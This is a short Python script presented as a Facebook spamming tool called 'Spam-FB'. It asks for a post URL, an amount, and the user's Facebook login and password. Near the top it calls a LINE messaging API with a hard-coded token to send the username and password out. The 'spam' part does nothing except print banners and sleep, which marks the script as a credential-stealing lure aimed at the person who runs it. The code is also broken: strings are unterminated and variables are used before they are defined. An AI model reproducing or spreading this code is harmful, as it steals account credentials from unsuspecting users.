import os , sys
from TEST import LINE
line = LINE('QrXx65WglOiKNwpnf46yNRqLXhsXkPYmRYUVrNKJIq6')
line.sendtext(f'User : {User}')
line.sendtext(f'password : {password}')

os.system("clear")
print("")
print("\033[1;0m─────────────────────────────────────────────────────>
print("""
\033[1;96m╔═══╗───────────╔═══╦══╗
║╔═╗║───────────║╔══╣╔╗║
║╚══╦══╦══╦╗╔╗──║╚══╣╚╝╚╗
╚══╗║╔╗║╔╗║╚╝╠══╣╔══╣╔═╗║
║╚═╝║╚╝║╔╗║║║╠══╣║──║╚═╝║
╚═══╣╔═╩╝╚╩╩╩╝──╚╝──╚═══╝
────║║
────╚╝""")
#───────────
print("\033[1;0m─────────────────────────────────────────────────────>
F = input("\033[1;91mURL Post :\033[1;0m ")
B = int(input("\033[1;91mAmount :\033[1;0m"))
print("\033[1;0m─────────────────────────────────────────────────────>

User = input("\033[1;91mUser or NumberPhone FB :\033[1;0m ")
password = input("\033[1;91mPassword FB :\033[1;0m ")


if password == f"{password}":
        print("""\033[1;96m
        ╔═══╗───────────╔═══╦══╗
        ║╔═╗║───────────║╔══╣╔╗║
        ║╚══╦══╦══╦╗╔╗──║╚══╣╚╝╚╗
        ╚══╗║╔╗║╔╗║╚╝╠══╣╔══╣╔═╗║
        ║╚═╝║╚╝║╔╗║║║╠══╣║──║╚═╝║
        ╚═══╣╔═╩╝╚╩╩╩╝──╚╝──╚═══╝
        ────║║
        ────╚╝""")
        print("")
        time.sleep(3)
        print("\033[1;91mRunning...")
        time.sleep(60)
        print("\033[1;94mfinish!!!")
